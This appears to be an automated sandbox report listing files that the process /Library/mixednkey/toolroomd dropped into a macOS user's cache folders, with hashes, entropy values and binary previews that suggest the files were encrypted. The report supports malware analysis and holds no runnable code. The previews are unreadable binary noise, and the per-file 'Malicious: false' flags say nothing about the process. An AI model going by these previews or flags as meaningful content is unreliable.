SSDEEP:	3072:qSzbCLJThVQjVtLxBA9ik3HV3LuUIJGNdsZS3Ez6:kTHQjVxxBA9i613LuUIJuuZW
MD5:	7BE1E0E17D06F3194FC4804515FA195A
SHA1:	C6F5BE9AD4A912255F50DF39227DA0AC50C05C5A
SHA-256:	9FF24A2C86C26DA5659F5B7C1E01960BB2A353991A0FDA18E4FB894C251C7ED2
SHA-512:	E9475F0DC4A7ADBCC8E2461E919B9428A23923EDCCA6DCD0EB0700693F51F5E7CBC02FE16256F90CDF1953CDA35B3059D974EF05B8885B1D0E424D05AE16CB72
Malicious:	false
Preview:	...a>k..~l;.r[..\|Va..H.J.GN..1.........y.T......$D.'..#_...J.....Uk....'.p.V..y.Ft.[..-...Y.22.P/.....-...Y.2......O..Eo.8L....w"c....].S.c.......?<....r...%.\|~.O.a.Eo.8L....z.........OB.-...Y.2.-...Y.2.-...Y.2tW....(.N.Z..D.yj.k4....xp......e..p....-...Y.2...A3L...-...Y.2...l..w.v...~...(.Z...'.....8..z.....1.K....%..m.......&!i.8W....>..'L....-...Y.2..=/Zg....E..D...........Q.4....X.........Me..k@.btY.L.........9Q.......F...&W.t`K....].~..I.1....D...........Ah@tE..%.....j....[~[.H....Q..m..'..!....+...,.#u.R..X..Cp.N@.vybG.Ba...C~...ap....-...Y.2.~.T."?#c^.1.4%.>.._...I.........J....x.......>..)d....O.1.\|".T./T..8...l..@7...\|.......{.].^.#10.....W..2...#tS.w..s.....&.-...Y.2%o...9.........\...@x.q.l+4.^.H.....A....\..4.KTP...~].5....\|....k5.....;R.^...*?...hf...!?.i.x...1....=.j..........s..b[....@.........8w....Q}.#,.....o..T...B;.a.CG..c.Y..........."..3...u....'...$..9./.;..:.....e4.>l....tOb.',..f...W...c!Rt..7.".."....v.Z._w.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/HelpSDMIndexFile/.com.apple.machelp10.13.2.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	292763
Entropy (8bit):	7.999351444477513
Encrypted:	true
SSDEEP:	6144:/pH2XrDKKMbuU/oxBQ+G/uNAh5KTzEoKEKRe38gwRCH:BKviu0BmK6EFEhsg5H
MD5:	BD7D7F4516A6922A2DBD2C6CBE5EDFB8
SHA1:	641CAB692583D8CAA55088C4C7335A53F0AE57FD
SHA-256:	99BAC2DF7D9F3378C83505F900A796B06ED8A6AC7192BEE2BF7342676BA3FDBF
SHA-512:	6CF53147E5BBA00A6CFAD9B00FC71D317DC6EA08E28406745E82DFAEE8874F05474AFB7894A9859007A3F00F34D4093F2ED8B56A00CE47A20B218ED763592354
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A........E'.P.[..UwI...z....v[..#....Bo+S...u..^.,...q.A"&...q.A"&D1..\|.\|..5..+..A.%...B....k.&.0=q....].(.w...P.......~Ie.>B..>..{..(..G..ki...=.1.:.......C....\|.....[....+.i.@.Q./p.z1...z...r.o{.8'..Xt.h..4Q...]K4.=&k.g..k....R.Oz...}._....Ox..w.Hy:...v..,h.... G.u.,zc!....E.=.z...j..M..-.L.a.T.}L..........6D&.....0...1G.!.cN.v......,.t....v..yH......H[...j^....I..a.. ..K..I...C..b...~_'.m.=....mp0..v..rO..SaS..........?....q..T..k,....@.....[?....:.A..("..=Dg...../.........-.=?.T.>J.Q..dq...X.B.....!..w.sk.\`.K....L.pl......7......u...J.].6.N/x.Q..0.y.jX(..o...X...b..Q.F.......b.../.@..w2K....Y^K........$-8.m..ui.....!....]v.a.f.^..N..{......MK......^.[/6g0........`...h.._..a.LW.J.r....(.....f..#.Y.......2....\z......x1%+..)FS..;9...:.).K.C/n..F...&.L.N:x.oHjN.q...p.-.....B.a"..U.tj.......W..D.Y...X#..>..{e_....

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.3323710502298325
Encrypted:	false
SSDEEP:	24:fzM3tJ0000000000000000000000N000000000000000000000000000000N000j:fz8UYNpq
MD5:	9AA5425BF7CAB3EE684FF34A6A105459
SHA1:	2C9A91C609600EB0D530EA3F4F40F91236A14D97
SHA-256:	7CB9954BA6D0B2DD61D80DA5287308D35B0E736F44301326570B7D7C13FB35D3
SHA-512:	6E7CE84636396D22A52CE50D91899263B0627149E42DA1C5F23062C59B5549B2429918895EFCC89EAEBA4EBA212F38CB6337E3A4E260733BFAE8D9BC13DF3BD1
Malicious:	false
Preview:	f...#D.........B...g......~.....q..>.4..I.P..f...#D.........B...g...R........q..>.4..I.P..6<.."a..kV......q.A"&6<.."a.....rW..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	4466
Entropy (8bit):	3.810366591527268
Encrypted:	false
SSDEEP:	24:iB0FU000000000000000000000000000000N000000000000000000000000000Q:Nt5Npq
MD5:	59D9FD82D91515FB8A290A0F038F7181
SHA1:	3B0C23AEC090E5443644252BA515822BE175CCA8
SHA-256:	34F16AB0533A40B1D7FADBEA78BCBF262971417D79401BC245768BEBC5648714
SHA-512:	CEB1337FA78F5A922DB9BF3283750FEA7BE219EF547F3FD465878C65B9E5E6F9F77131FF66C86376BC1D0501F45FC146FB78A719F37244A0B19481FB7E28F9C8
Malicious:	false
Preview:	^u..o.F.47.W&.z..q..>.u_....Q%..eu...4.q..>....@.!..=...?^.".R7..}Kt....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	28995
Entropy (8bit):	3.5501255371439946
Encrypted:	false
SSDEEP:	24:ndmcgqOI40000000000000000000000000N00000000000000000000000000009:n5iIN6MBeRitvRBtZc7OfOOiNpq
MD5:	33F5CDCD57F4D9C886C5D34B1B1E1256
SHA1:	A3E543E8DE2278EA32E62743ECE3C953D78EEB27
SHA-256:	EF97700EF1DDFD5EAADA02E5F9925C804AE667F18366A88A84399C4B89C0D62F
SHA-512:	748EA1841F699D259BBEC936DDF1937E268A7418224BFF27990E496E82AE0F3C56FC1B23A39F955608B4BBCEE15CF55966806EEA197673E8294A0CD1BADD932E
Malicious:	false
Preview:	..d.=..._t.........X.....9....6<.."a....i%0..p.EGyU'&..7...x..7...xt....Sq6<.."a..VTZ..'.^.#$:.N?U`..o.m........6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.0500C3D8-71CC-4F10-9A04-C734C0372C56.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	13394
Entropy (8bit):	6.759144015126993
Encrypted:	false
SSDEEP:	192:Joz3dgZfQDu4uKM7TdkYk62eh1JNng6WjUNzARPcJ:Joz3dwQD1M7SYk69JNKM0U
MD5:	F172068AE654665B9B2745243FBEFB13
SHA1:	7385B0A0F398CCBB4FFC1A331099EAA6C2FBB537
SHA-256:	25B0A6A0A8A05057B246C1366ADDDA5D5080C8714205430D1D995C39128E064D
SHA-512:	D83BFFF77E6A144FC030C7F6A9D52AC132CF90B8B9B243FE762D3BEBB7B044A6A5E6382A1951F53F7B0A044FD5E3FE401DC2F30D9D7142A1C39E52292FFC0A5C
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:....T..\|\.......q:....TJ.k.S.U.4.......v^.;....7...vP...Z...M..{....j._X#F..q.u....2....M....e....:8.%...YKs.......)A......AF.Cy...U.L..cK...;..+Mj.wFpHXT........#,..sH..!2G......kb.7...q.A"&...q.A"&0u.5.a.#...7.z?jM@$.[.#../...v.;J.B.:...q.A"&...q.A"&...q.A"&.l.f".'....b..}...C.%...o1..!........\7....rW....v.]45...q.A"&3...S...6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&%n..Yf.6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&.<...i..6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&..`.YS.h6<.."a........F...q.A"&..Bo.R.....kb.7...q.A"&...q.A"&..I.L.....kb.7...q.A"&...q.A"&+.Z.#Cb.6<.."a........F...q.A"&. .^...s...q.A"&...q.A"&...q.A"&...........kb.7...q.A"&...q.A"&.<...i..M8...9........F...q.A"&..`.YS.hM8...9........F...q.A"&..I.L..0<-.f....2gPB<....p....P.k.....PQ.....'.rhQ\...._3^..\...]..ae.....}.c.K.Y........q.A"&

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.06811EED-910F-4F71-84F3-0549384B555E.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	8562
Entropy (8bit):	7.927716161284517
Encrypted:	false
SSDEEP:	192:DWv5a3AAqNpUuIkZ8Q28bhXTO7c5vzUi4K4kRM4U/4OBBfdA:DCamTh+Q28btd5LH1hRh4PA
MD5:	EA9237C19D66745F7A7D107999D28A5A
SHA1:	2D166710C793BF28AA1BCC6CB3A9CB78C542FB22
SHA-256:	5A246C627EBFD87242E95240078A467C1603A0A2FC53C582FAFFE1289C2DC65A
SHA-512:	388CD3AB25C0201FD16D8E6510B02B3571079B8C2F6EA3DEA4EC0BB6A254246ABB2F58AF2600D155F24AC5596F4E06C26900089A5B218F25855DEC2FF9BBDD90
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W\|.+....&2-q..H"........._.....w;...S.......!......m..d.G........:X!.L...b...fTE.eK..vM.0.{].#..e&^.EO...n...d..\.F.2..[...o..Hm'.lt.8.gsZ.g...>.<./o2F...q...P..S..kFB...B.d..]..Ia.../x.+&.....c."E.[.!....(.SWf.<N..$.xT..v..R..h..o.....1.<..$.A.Z.(....w......Y...Tn.....C.>{...`..5{...9.}6.. .P0h.M.V....\E.......u.LT..a.....'.R..1...T.....St..JR.l;.p}rSx...x.i.....0R.D._.(Qvt.$aEmO.U5..._...H\|."N..91A......Q.yIm..Y.l..c.Xg(Ur....7...g.....j.F.![.~.p.u...#..<.\|u.t/....Y..6._d.&....;V.S.P.7..%.\.......).GO.....9C;..]vF;j\|6...7...SR.I.q..U..>NaK..vM.0.{].#..e'.n.q.\|. ..$.'<BS+...s.?.b...fr;^<...9\|HT.q.../.N.kA../u...\...w.G......g.tOKq.!Cz2...Q.........t.v~=8..}Y...?a.hMb.rm<".......'.R..1...T.....St..JR.l;.p}rSx...x.i.....0R.D._.(Qvt.$aEmO.U5..._...H\|."N..91A..L......n.........1....O1..q...T..O#l#p..\|7G,.2.].v:.t.^.#.3..2.......@1]}..W.!..D.s\hd.y....O......(.Vwm.[5....+..)._x...a.EK!....,w.[.......O...a....Q.h...L..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.09EC5A9B-FCC4-44B9-9CE2-E866A248B37C.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	138850
Entropy (8bit):	7.938971304966909
Encrypted:	false
SSDEEP:	3072:Ga6VbjcKiL3n8Hc6G6Pa2ftXH18Z/jnJxVeSJ8yE0eO3j:d6VvcKiLnW3ft318pj3p9t/3j
MD5:	FA09BD7B6C013C127EB769BD2D13C1F8
SHA1:	6CBE0486B3535526044319CD09EE599DED4FFA07
SHA-256:	CC96E0104F552343D9DDD804B20F830D486EADFC6DE5B52AF50C148161EE1826
SHA-512:	2CAF6DA6A474A73793016E33196E683F293BBE20D8FF4830147FE0C6A615011E18FFC3FDBAD710CA797D7C1B1C6879B5EB97A7A74A7A438ABB1A9F80C2395924
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:..(..;.wI.%.24.....s>o<.TJ.k.S.U.4.......v^.;....7...vP...Z...M..{....H.\|..\=(....7.4..H.>...'.I...I...J%....h...#.....v..O................:.zi....!....'.7.Ru.^N...<..>s.{...u..N4.U......S=u.C...O.o..M[.5....$....F.%._..>s.{...u..N4...=....e..%......!......B.u.^N...<..>s.{...u..N4.U.........3n.8O.o..M[..f.........F.%._..>s.{...u..N4...=..'W..t.,O....!.....y.u.^N...<..>s.{...u..N4.U......t......nO.o..M[...o=>p.T...F.%._..>s.{...u..N4.........H....F...O.......`%.)#n..H>_.z....dh...<..!.w....6N\5..v..;zC....+.d.U.<....m,;..W.6..M..2...x.C.R..'...........W...{......gcL/j.....u..P.....^..p...r%...V..;K.?.y=.].+... ...0..g..X..@Y.......v..O........db..<-?......T... ..Xh2...0.............v..O......^..i.....\...n...$.z..q.a...].1..\|.b.P.....^..p...r%...,a...$9..d#.}..g.?.....E/.v(4.B..z.R.6..M..2...x.C.R..1...4.L\b.+-.+..'u.]T.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.0B1EF230-3CC4-41CA-AAF8-A14619F7CB61.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	6154
Entropy (8bit):	7.887097236308412
Encrypted:	false
SSDEEP:	192:dMbenFQpko0v1kVp4UPZn+dJqqxt2tptda1C/:UkQGfvSVkmq2a1u
MD5:	4F6452944E06818C1C9F58BDC308D222
SHA1:	673176D6FAA12552AEEB9361247D062AFF6EA293
SHA-256:	C9AC23F21385FB97A1DFE05368CABEB7422B35DFA3A29405EF9142DEBE6CACC4
SHA-512:	6F076389A08D71B55DE06AE5AA47D3ACE16BE20AE7BA995213A2BBD5E0346C7323C1169BB79BBCE7A898D62D6161E17B0DB8243D9AF2A9DE699386EF4FB18786
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..WI.:_."..u...U.INl3.g>...q...}.0h..k........!......m..Y1 ;.w`/^.t.=.L...b...fTE.eK..vM.0.... G.k..{.....xn...d..\.F.2..[...o..Hm'.lt.8.gsZ.g...>.<./o2F...q...P..S..kFB..+.T.......l.&l...7..%l.W....j...(.9^.I.x..,B'(F.YC.c....Vq.Y../3...h.V...R.....d...iw......Y...Tn.).T.].;.t{..cZ.....K..+.. .P0h.M.V....\....P.5...Cg..?+.....'.R..1...T.....St.n...[.p}rSx...x.i.....0R.D._.(Qvt.$aEmO.U5...t....Rg1.X.[.........Q.yIm..Y.l..c.Xg(Ur....7...g.....j.F.![.~.p.u...#..<.\|u.t/....Y..6._L7...O....q..Z....~V.......).7.p..,..Z_..'.....:W..SR.I.q..U..>NaK..vM.0.... G.k."nz...l.Y..x.N..H..........\.`...I%+..=.{0..I.<......7.h[..;....5.;..\|..m....}.....!.I..^@...u..+.N/..#z...v..../..5p.8q......t...[y.f>uy...,L...gq......)R....i..tD.\|E.~<t...E_....n....A0=..c.\..Hm~...;.._....._.R......h./..CJ..m..D...I....]3.'...2..nQ.N..&.3......d_.))=e..X.w...3...jw..E.k...t.........,c.m...".IO./....^.;......Ne9..Xc.V90;S....W.6....G

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.0D33E0DC-786F-4B93-A829-78FCB8C38FD8.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	15442
Entropy (8bit):	7.0874797391574385
Encrypted:	false
SSDEEP:	192:Jois2B8Gg4dGpLhh07qHrBrXNdgpP6BBziWT4SrBrUg:JoMdNQpLwIrdupP69UKrZ
MD5:	719BFACCEB7DA0430651A3E079D47D40
SHA1:	62B662D39BBBA8C3148D1D22E44DAB1BF4CA4843
SHA-256:	E48F1A1915B391AEA72C2DAFE08609860C959B7BA3DF42783B7AF6D5FBD83F11
SHA-512:	12E868653104FD3B5C6F3021657F64C98FDB4251C020EF76622BA208A20FFD6A50664FCD3FD265966EA08A28228166C705DA6954768AE11DC73DEDAA156B9351
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:....T..\|\?....%.w..t....h....j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{.."..;.t5.'6...<;...L.}g.......5If....../..u. ...1....J....v...I......$..j........]..hD...P...1.1..9.....u..}R...9..[\|z~q....q.A"&...q.A"&.;...b.k..5..;....q.......C.=.!.g3SX.!.`...q.A"&...q.A"&...q.A"&e(...'....l.6....g.H.0..z.2?Z.Y..y..;..o6.n.~h..1.b...q.A"&.TEu...6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&a.(."Lz.6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&.P....O6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&......6<.."a..B...ce/....q.A"&......S..[\|z~q....q.A"&...q.A"&.......R..[\|z~q....q.A"&...q.A"&$.`n.`B.6<.."a..B...ce/....q.A"&.-"e.^>....q.A"&...q.A"&...q.A"&.%.d...\|..[\|z~q....q.A"&...q.A"&.P...*.O..K.....B...ce/....q.A"&........K.....B...ce/....q.A"&.......R(.....F?..8%...vm\....@X..2.hn"A.(.. .. N..i.Q.[......2."..8......:.,.j....d.... ."

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.0F087FFD-0CA5-45C5-9228-005B6B603CC3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	16955
Entropy (8bit):	7.952229479042166
Encrypted:	false
SSDEEP:	384:JpKbZ0hab5Ew4+pJZlQB/qruBzZdg+HkQWekNjrPdx:UZ+g5Ed+Hu/9fg+HkJNndx
MD5:	9C175C2C813282E89FD45ABD06071721
SHA1:	F4D90689778B2B7E69321C1E601B7FEC147CCC1F
SHA-256:	E77629AC955C494DBF5454254CCB57C61ADC8E93511A792F1B4AF3921571D61B
SHA-512:	99DFD5D06AB9622FC4F95475241C259817D11283D29BF9E93D299F05ADC6CE91AAB17E2BA7BC38B127EC02D8814E2299995955B3385797C43FA2478FD13418B2
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W....r..e0...(.@{. ...F....1.".o..XE.........!......m....../..3T.])4g....[...1J.JgB....../.......vQ..$...Q.= =..Ir04;..4.b.<....x..xHq...R..,.....idD...>.=...q."..P....A.....u..m,2.R...\.p.....R......uo.......R.Z.A.....0.h(.C.b...9=/.f...K..>..n.%..5W....\.TK..'....._h....U.....Bn.Z....kE..S/..}D.3...G&F.W.\........A_.(Qvt.$aE.G...c..$.\|g.K...X.[..........D.....~'.=Q.........Z.L.vq...5..I..o...m..h..}~..l,:@..!./.......&4./....'...~..tI..?.B.)....R....j.9\.-..O.drWc..8.h..@R.9>....\|.@...)..)._..Rq...j..?......_..O..0.R...n..m...k..%...?..6......Y.c.....~<K...F....eb.~[.mA.e...)!%...>.5<.......~X......,"..g.u...... 9.t[..+M..0%...4:.0@.oa=.S...\|7L.c..mQ&.....T..........B...uS$...4O....Z..P..`c.5.b.4.%............Cn.........A_.(Qvt.$aE.G...c..$.\|g.K...X.[...........%.....~'.=Q.........Z.L.vq...5.(-.3.....L.^....nw..(".o.nfe...8.5c.d.^...H...........o.........(.....r..s....Q..Fj..,.Q..37...j...0..4.x7T.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.1163B4FB-CC70-41B9-995A-7FAF926BBB0E.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	21779
Entropy (8bit):	7.954123324053065
Encrypted:	false
SSDEEP:	384:NqdQE3E1mpuhCopg6w+Ew162Y4Nqj8uI8+gn2UzBmlXugofD6ln8t:Nqd301aunpg6wRw16d404uI8+g2Kml+J
MD5:	D6582AFCB4155AF79834BBBE28F0129A
SHA1:	E5C32A9357A3F16B90EF15EA5CB6C8E38556682E
SHA-256:	B3F7196E5B655F0CD744C221E40B3E520B4EDE274A12639532FC8F06D71400BF
SHA-512:	004EA42F9D6CE910C15C4C9A69CEE6E7370D95C20B941BDB270D4C65023B36744150A82D4D49336FE1E00DBC9F18B356DDF38AB38350964D0A1E0C70F7384579
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W...4.....E.L4..\.?..f.zkS..K..R]7^zm........!......m..MD.......V.U._.zi.Y...........eb.~[..Hd.Sx..1.!pFq.VL....y..... G.k..XqRL"R.Q......}`.._..Yi.NDG..^1W'...gGA.M.g.L..g......:jvI:M.{.?..c..$z...(X.J.}9....n^...B...w.J.o+B.uu.;H... .eL..\|.`....:.7z..y._Sw.]...$..y...J.....C.D...&!...Jf./......g<..`.Z..Vl8......)R.g.l^}....%.+<nJS....O.ZgD..4FtA0=..c.\..Hm~...;.._..mv.imm..ei....N46d._...D...I.....)........ .E.6g.....U./^9.,..Q.l...z.]..V.>....M..{E.....9Mm.....i.B.0N...d.)+TA.$.............8.h..@...D...Hn.....``.....}.v..K...jK..vM.0.... G.k...8.A....'tI. 1..= .2 95....,...W.r.,&.i..._.f$.n.S..2Xl..<Z?..W.'.W?".L...I.O.X.......UE...d.K.H.,w.B.....ABUK./..O.W...=7.@.St.PE.&y....@.t.d..g.3.B.i..d...R.jW.].Ut$4..}.........uu..!.j.#l....!.cR..D...M......Z....Am.5I.....w.....<..G..q........>.... .......F.1......W....z.V..G...NO......3.x.J"..H.c).yW....dc`N7.Cc.!._;>..Vt....JaoO....9..<...Z;.!rP..2...Q.= =.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.1525134B-E175-49D0-9C5D-0DE132EC2F9C.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10114
Entropy (8bit):	7.929462536982463
Encrypted:	false
SSDEEP:	192:vhEmN6ZVMmZNm0s8M107hbfDf2UfS+P0bavbsCTW3OOaomKdusrMRiW4Sj7qLn5:1LmnQofD+UfSyekOA4QiF
MD5:	EDD8328EBDF46D14CD579F6F9CFD9AB1
SHA1:	9BD690B2118AF6B91EAA651778896D9D71018FF6
SHA-256:	F050859F5C3FDAC719A42F5C4686214CD0D3761480607B6BA54BC8D9831976C8
SHA-512:	99A3E896483C6263E2C5AB634C21A737A570B4E74F2D9D5983A0AD2E95DD48BFA52F8936BCB7C5BA4E4259621107EAC0AA739251A47CDCBDBF8E424B81B6AA43
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W...2'6.]..{.?..1....{...!\|.?.R.......y.T......!......m[..g..'H.^vh.&Y..h.....4g....[...1J.JgB....../.....n.....4M.......3R..0F...C..J3........7.%^..RB..cvI.....<...dIV...P..:...l.4.........Z.1w...A......zV.Y..fG.N.......g..mj.>B`X....rX$.....6h..\^.0..]....o......\...i.\|M.$.....;...v\o.}.^%.j.#l...p..j..g.......~....N..I....\|....:R.(.....c.A...HY..f..4% lHB,W.:..1yC..^.S....6..Y.....[6.......B5g..nA._..6.{:).yn....'.......&../R.H....................h..Muu......+1....N`...Kmg....i...}..77.#.....U...i{.b./..L.'E]..~..v-..L..k...d...@gi.\i..n8.-.$..`<..S/..}D..^.,.{.."...Nx..0lW"....+w._Ao#...y.\|.....(.".+M..0%.-...h.v.\F.IHP...A..?.....r !..5..BF.d7I.7.v.Wj9DA...,w.B.....ABUK./..O*.W..o.Z.sQA...P.)F...;.......[.YoJ.i..d...R.jW..\|M.$..7L.Laf....1....&.j.#l...5.v........M......Z....AHq...R....w.....<..G..q........>.... ......"?...w.z..R.ICro.+.V!s\hd.y.......a...WK........z.....j....]\....`@.....VR$.%.y.o\|

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.16B65782-25C9-4DF2-AD10-5621031126CD.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	13394
Entropy (8bit):	6.6411474204869085
Encrypted:	false
SSDEEP:	96:Jo4T/rowe/TQsxwUyGaMWK8686UO1hZdab42KICSARX53/M4d9twu:JoQz2B8GaHK86rU2kb42pNOX53/MS9
MD5:	4124E5A1AA7B8522B6DC862D6AAD9657
SHA1:	4028FE0365AD4C2B0DDB1744E67AD8B7AC90A2FA
SHA-256:	2AE359F51B075552420CED7309C7873416F66F1AE8943D1E297CBA6873EA0AAC
SHA-512:	3816DE3DA0F7A67C59B6D5CAD1E2095123A1A8BB418C629CA89EB51817C8936A9EAE5E07133E24F7620CC6B58291F3208451FFBFE6D085677A9F8E4122F7DFDA
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:....T..\|\7........R9:..X....j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{.."..;.t50.P.G4U$...L.}g.......5If....../..u. ...1....J....v...I......$.I..:.]R!..z:.Y.\|..b..{..J.+...d..}R...9..[\|z~q....q.A"&...q.A"&.;...b.k..5..;....q.......C.=.!.g3SX.!.`...q.A"&...q.A"&...q.A"&e(...'..a.........g.H.0..z.2?Z.Y..y..;..o6.n.~h..1.b...q.A"&.TEu...6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&a.(."Lz.6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&.P....O6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&......6<.."a..B...ce/....q.A"&......S..[\|z~q....q.A"&...q.A"&.......R..[\|z~q....q.A"&...q.A"&$.`n.`B.6<.."a..B...ce/....q.A"&.-"e.^>....q.A"&...q.A"&...q.A"&.%.d...\|..[\|z~q....q.A"&...q.A"&.P...*.O29.H..`.B...ce/....q.A"&......29.H..`.B...ce/....q.A"&.......R(.....F?..8%...vm\....@X..2.hn"A.(.. .. N..i.Q.[........ibG..X>f..V..,.j.......o.!.

